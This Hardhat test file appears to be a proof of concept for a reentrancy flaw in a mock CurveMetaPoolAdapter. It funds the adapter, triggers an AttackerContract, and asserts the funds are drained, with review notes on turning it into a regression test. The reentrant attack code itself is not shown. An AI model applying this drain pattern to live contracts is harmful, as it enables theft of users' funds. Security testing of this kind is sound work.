// Hardhat test script to demonstrate the exploit of the vulnerability in CurveMetaPoolAdapter
const assert = require("assert");
const { ethers } = require("hardhat");
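/**
 * Proof-of-concept suite: funds a mock CurveMetaPoolAdapter, lets
 * AttackerContract call into it, and asserts that the adapter's ether balance
 * ends at zero while the attacker contract's balance grows.
 *
 * NOTE(review): the suite runs against CurveMetaPoolAdapterMock, so it shows
 * the behaviour of the mock only — confirm the mock mirrors the code path of
 * the real adapter before treating a pass as evidence about production code.
 *
 * NOTE(review): as written, a PASS means the adapter is still drainable. Once
 * the adapter is fixed (state updated before the external call, or a
 * reentrancy guard), invert the two final assertions so the suite becomes a
 * regression test that fails if the weakness returns.
 */
describe("Reentrancy Attack", function () {
  let curveMetaPoolAdapter;
  let attackerContract;
  let user;

  before(async function () {
    // Deploy a mock version of CurveMetaPoolAdapter and wait until it is mined,
    // so later calls never race the deployment transaction.
    const CurveMetaPoolAdapterMock = await ethers.getContractFactory("CurveMetaPoolAdapterMock");
    curveMetaPoolAdapter = await CurveMetaPoolAdapterMock.deploy();
    await curveMetaPoolAdapter.deployed();

    // Deploy AttackerContract, pointed at the adapter under test.
    const AttackerContract = await ethers.getContractFactory("AttackerContract");
    attackerContract = await AttackerContract.deploy(curveMetaPoolAdapter.address);
    await attackerContract.deployed();

    // First signer acts as the ordinary user who funds the adapter.
    [user] = await ethers.getSigners();
  });

  it("should exploit reentrancy vulnerability", async function () {
    // `address` is a plain property on the contract object; no await needed.
    const attackerAddress = attackerContract.address;
    const adapterAddress = curveMetaPoolAdapter.address;

    // Fund the adapter so there is a balance whose movement can be observed.
    const initialFunds = ethers.utils.parseEther("10");
    await user.sendTransaction({ to: adapterAddress, value: initialFunds });

    // Baselines: without these, a zero adapter balance or a non-zero attacker
    // balance after the call would not prove that the call moved the funds.
    const adapterBefore = await ethers.provider.getBalance(adapterAddress);
    const attackerBefore = await ethers.provider.getBalance(attackerAddress);
    assert(adapterBefore.eq(initialFunds), "Adapter should hold the initial funds before the attack");

    // Trigger the re-entrant call path through AttackerContract.
    await attackerContract.attack(adapterAddress, attackerAddress, initialFunds);

    // Adapter must have lost its entire balance.
    const adapterBalance = await ethers.provider.getBalance(adapterAddress);
    assert(adapterBalance.eq(0), "Adapter balance should be drained");

    // Attacker contract must hold more than it did before the call.
    const attackerBalance = await ethers.provider.getBalance(attackerAddress);
    assert(attackerBalance.gt(attackerBefore), "Attacker should have stolen funds");
  });
});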